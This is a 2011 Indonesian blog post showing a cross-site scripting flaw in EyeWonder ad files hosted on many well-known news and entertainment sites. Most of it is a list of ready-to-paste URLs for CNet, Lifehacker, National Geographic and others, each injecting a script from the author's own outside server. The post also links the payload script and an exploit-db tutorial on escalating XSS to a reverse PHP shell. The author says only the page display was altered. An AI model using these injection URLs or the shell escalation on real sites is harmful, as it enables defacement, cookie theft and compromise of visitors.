Minggu, Oktober 23, 2011

XSS Frame Busting untuk Hacking Situs-situs Terkenal

Penulis Day Milovich | Minggu, Oktober 23, 2011 | 06.19.00 |



Apa jadinya kalau website terkenal (CNet, LifeHacker, National Geographic) dikacaukan dengan XSS?

Mereka menggunakan script iklan dari EyeWonder. Website raksasa yang saya cantumkan berikut ini menggunakan EyeWonder. Sayangnya, HTML yang dipasang dari EyeWonder menerima arbitrary URL sebagai parameter dan menjalankannya dalam tag <script>. Kalau source script-nya diganti, tentu saja website itu bisa di-XSS (xross-site scripting) dengan metode "frame busting".
---
Silakan copas link-link berikut ini di browser dan lihatlah gambar berputar, tulisan berbalik, dan kekacauan tampilannya. Hacked! :))

http://news.cnet.com/eyewonder/interim.html?src=http://vetostudio.info/webdev/script/eyewonder.js

http://www.nydailynews.com/eyewonder/interim.html?src=http://vetostudio.info/webdev/script/eyewonder.js

http://lifehacker.com/gmcommon/eyewonder/interim.html?src=http://vetostudio.info/webdev/script/eyewonder.js

http://animals.nationalgeographic.com/staticfiles/NGS/Shared/StaticFiles/NGS/Eyewonder/interim.html?src=http://vetostudio.info/webdev/script/eyewonder.js

http://nymag.com/eyewonder/interim.html?src=http://vetostudio.info/webdev/script/eyewonder.js

http://celebritywonder.ugo.com/news/eyewonder/interim.html?src=http://vetostudio.info/webdev/script/eyewonder.js

http://www.ultimate-guitar.com/eyewonder/interim.html?src=http://vetostudio.info/webdev/script/eyewonder.js

http://apps.eyewonderlabs.com/eyewonder/interim.html?src=http://vetostudio.info/webdev/script/eyewonder.js

http://www.iloverichmedia.com/eyewonder/interim.html?src=http://vetostudio.info/webdev/script/eyewonder.js

http://www.commentslive.com/eyewonder/interim.html?src=http://vetostudio.info/webdev/script/eyewonder.js

http://www.dazzlejunction.com/eyewonder/interim.html?src=http://vetostudio.info/webdev/script/eyewonder.js

http://www.stickgames.com/eyewonder/interim.html?src=http://vetostudio.info/webdev/script/eyewonder.js

http://www.mylifetime.com/eyewonder/interim.html?src=http://vetostudio.info/webdev/script/eyewonder.js

http://www.gamefoolz.com/eyewonder/interim.html?src=http://vetostudio.info/webdev/script/eyewonder.js

http://www.bettermedicine.com/eyewonder/interim.html?src=http://vetostudio.info/webdev/script/eyewonder.js

http://www.flightstats.com/go/eyewonder/interim.html?src=http://vetostudio.info/webdev/script/eyewonder.js
---
Yang tidak berani nge-klik, ini ada screenshot-nya:
https://lh4.googleusercontent.com/-RyPpyvM_oBc/TqNKSkOuniI/AAAAAAAAAcs/iMsgF9hhACs/s640/xss-cnn-day-milovich.jpg

https://lh5.googleusercontent.com/-uKmi8gNKcd8/TqNKPFTB3eI/AAAAAAAAAck/QUt0DA9FMnA/s640/xss-mashable.com-day-milovich.jpg

https://lh5.googleusercontent.com/-g7ARv60HUG8/TqNKTF71R0I/AAAAAAAAAc0/PumdLmW0dck/s640/xss-foxnews.com-day-milovich.jpg

https://lh6.googleusercontent.com/-eb-wU9zcsYc/TqNKZdCFJ6I/AAAAAAAAAc8/gQU22tPto5I/s640/xss-newyorktimes.com-day-milovich.jpg
---
Script yang saya gunakan:
http://vetostudio.info/webdev/script/eyewonder.js
(sedang memakai bandwith unlimited.)
---
Tutorial XSS Menjadi Shell:
http://www.exploit-db.com/vbseo-from-xss-to-reverse-php-shell/
Screenshot XSS menjadi Shell:
http://www.exploit-db.com/images/maxevbseo/webtool16.png
---
*) Saya mencobanya pada jam 05.50 am (GMT+07:00) tanggal 22 Oktober 2011. Tenang saja, saya tidak mencuri cookies, tidak mengganti file apapun, dan hanya tampilan di browser saja yang menjadi kacau. Saat artikel ini ditulis, situs CNN dan MySpace sudah diperbaiki dari XSS EyeWonder.

Tidak ada komentar:

Posting Komentar

Anda bisa berkomentar tanpa perlu login.

 
Day Milovich (c) 2013. Diberdayakan oleh Blogger.